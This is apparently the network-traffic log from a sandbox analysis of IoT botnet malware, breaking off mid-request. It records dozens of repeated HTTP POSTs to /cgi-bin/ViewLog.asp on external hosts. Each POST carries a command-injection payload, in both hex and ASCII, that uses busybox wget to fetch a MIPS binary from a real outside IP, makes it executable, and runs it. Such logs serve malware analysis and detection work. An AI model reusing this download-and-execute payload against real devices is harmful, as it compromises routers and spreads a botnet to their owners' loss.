                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:22.982353926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.846214056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              336192.168.2.134330094.120.243.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:47.047990084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              337192.168.2.134307494.122.208.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:47.052726030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              338192.168.2.135497094.122.62.498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:49.555002928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.758500099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.166423082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.078435898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.710417986 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:11.974385977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.270323992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.326184988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              339192.168.2.134899831.202.91.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:49.999679089 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              340192.168.2.133967694.183.154.2488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.081857920 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              341192.168.2.134652694.121.155.1708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.229804993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              342192.168.2.136091295.86.65.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.232736111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              343192.168.2.134160895.92.109.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.767713070 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.974617004 CET602INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:50 GMT
                                              Server:
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              344192.168.2.134249694.120.148.1958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.790235043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              345192.168.2.134812031.207.33.2048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.945446014 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:51.123466015 CET610INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:51 GMT
                                              Server: Apache/2.4.25 (Debian)
                                              Content-Length: 362
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              346192.168.2.135810085.69.27.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:50.948627949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:51.494424105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.614408016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.822451115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
